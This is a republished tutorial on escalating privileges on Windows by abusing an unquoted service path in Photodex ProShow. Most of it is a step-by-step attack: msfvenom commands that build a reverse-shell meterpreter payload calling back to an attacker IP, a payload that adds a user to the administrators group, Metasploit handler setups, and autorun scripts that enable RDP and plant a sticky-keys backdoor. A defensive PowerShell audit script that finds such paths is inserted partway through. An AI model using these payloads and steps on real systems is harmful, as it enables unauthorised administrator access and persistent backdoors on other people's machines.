How to raise Rights under Windows platform

2025-04-08 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

This article shares several ways to escalate privileges on the Windows platform. The editor thinks it is very practical, so it is shared here as a reference; follow along with the editor and have a look.

Unquoted service path vulnerability

This vulnerability concerns the path of a service executable. If the path contains a space and is not wrapped in double quotes, an attacker can replace the legitimate exe file with a malicious exe file and escalate privileges.

Environment building

Target host: Windows 7

Attacking host: Kali Linux

First, we need to download and install a vulnerable application called Photodex ProShow on the target Windows system; the download link can be found on Exploit DB.

Compromise the target host

In order to get a meterpreter session, we need to compromise the target Windows device at least once. As you can see in the following figure, we have obtained a meterpreter session on the target host. Now open a command shell:

shell

As you can see, the shell we got runs as the local user local_user. In order to get an administrator cmd, we need to escalate privileges. First, we enumerate all the services running on the target host and find the service paths that are not wrapped in double quotation marks, which can be done with the following command:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Here, we enumerate the following paths:

C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe

This path is not wrapped in double quotation marks, and it contains spaces.

Now we need to check the permissions on the file with the following command:

icacls Scsiaccess.exe

As you can see, it grants write access to everyone, which means any user can overwrite the file:
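An audit script for the condition just described, added here as an example (it is not from the original article): it applies the same unquoted-path check as the wmic command and the same permission check as icacls to every auto-start service, flagging any executable or parent directory that low-privileged principals can write to. The $LowPrivPrincipals list and the C:\Windows exclusion are my assumptions; adjust them for the environment being audited.

```powershell
# Added audit script (not from the original article): finds auto-start services whose
# executable path is unquoted and contains spaces, then reports which directories Windows
# would search (and the target exe itself) are writable by low-privileged principals.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'NT AUTHORITY\INTERACTIVE')   # assumption: tune per environment

function Test-UnquotedServicePath {
    param([string]$PathName)
    # Flagged when the path is not quoted, contains whitespace, and lives outside C:\Windows
    return ($PathName -notmatch '^"') -and ($PathName -match '\s') -and
           ($PathName -notmatch '^c:\\windows\\')
}

function Test-LowPrivWrite {
    param([string]$Item)
    # True if an Allow ACE grants WriteData (bit 2; also set by Write/Modify/FullControl)
    foreach ($ace in (Get-Acl -LiteralPath $Item).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band 2) -ne 0)) { return $true }
    }
    return $false
}

function Get-WritableLocations {
    param([string]$PathName)
    # Strip service arguments: keep everything up to and including ".exe"
    if ($PathName -match '^(.*?\.exe)') { $exe = $Matches[1] } else { return @() }
    $hits = @()
    if ((Test-Path -LiteralPath $exe) -and (Test-LowPrivWrite $exe)) { $hits += $exe }
    # Walk every parent: CreateProcess tries C:\Program.exe, C:\Program Files\X.exe, ... in turn
    $dir = Split-Path -Parent $exe
    while ($dir) {
        if ((Test-Path -LiteralPath $dir) -and (Test-LowPrivWrite $dir)) { $hits += $dir }
        $dir = Split-Path -Parent $dir
    }
    return $hits
}

Get-CimInstance Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' -and (Test-UnquotedServicePath $_.PathName) } |
    ForEach-Object {
        [pscustomobject]@{
            Service  = $_.Name
            RunsAs   = $_.StartName
            Path     = $_.PathName
            Writable = (Get-WritableLocations $_.PathName) -join '; '
        }
    } | Format-Table -AutoSize -Wrap
# Remediation: quote the path (sc.exe config <Name> binPath= "\"C:\Path With Spaces\app.exe\"")
# and remove write access for non-admin principals on the flagged files and directories.
```

Run it from an elevated prompt so Get-Acl can read every directory; a service whose Writable column is empty still deserves quoting, since permissions can change later.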

Privilege escalation via process migration

Now we just need to place the malicious exe in the same folder; it automatically runs with administrator privileges, because when the service restarts, Windows starts the malicious exe.

Open a terminal in Kali Linux and generate a malicious exe payload with msfvenom using the following command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 PrependMigrate=true PrependMigrateProc=explorer.exe -f exe > /root/Desktop/scsiaccess.exe

The above command generates a malicious exe file on the desktop, which is then sent to the target host. The payload migrates the malicious process into explorer.exe, so if the user terminates the original process by its process ID, the attacker does not lose the session.

Now replace the legitimate executable with the malicious exe. Here, I renamed the legitimate Scsiaccess.exe to Scsiaccess.exe.original, uploaded the malicious Scsiaccess.exe to the same folder, and then restarted the target host:

move scsiaccess.exe scsiaccess.exe.original
upload /root/Desktop/scsiaccess.exe

Reboot:

At the same time, I started a handler in a new terminal to catch the meterpreter session:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

After a while, we get a shell with administrator privileges:

Privilege escalation by adding a user to the administrators group

Once we have a shell with local_user privileges, we can enumerate the full list of user names. Here we find that user raaz is not a member of the administrators group:

net user
net user raaz

Similarly, we generate an exe file that adds the user raaz to the administrators group; the malicious exe is again named Scsiaccess.exe:

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/scsiaccess.exe

Repeat the steps above to replace the legitimate exe in the same directory with the malicious exe file, then restart the target host:

If you take a closer look at the screenshot below, you will see that user raaz has become a member of the administrators group:

Privilege escalation via RDP and sticky keys

Use msfvenom to generate an exe file with the same file name (Scsiaccess.exe) and send it to the target host as before, then start the handler with an AutoRunScript that enables the RDP service:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) > exploit

Similarly, when the target service restarts, we can set an autorun script that enables sticky keys:

msf exploit(multi/handler) > set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) > run

As the following figure shows, the command opens another meterpreter session (session 3) with administrator privileges, and we can now connect to the target host over RDP:

Rdp 192.168.1.101

Next, press the Shift key five times in a row and you get a command prompt window with administrator privileges:

Thank you for reading! This is the end of the article on how to escalate privileges on the Windows platform. I hope the content above is of some help to you and lets you learn more. If you think the article is good, share it so more people can see it!
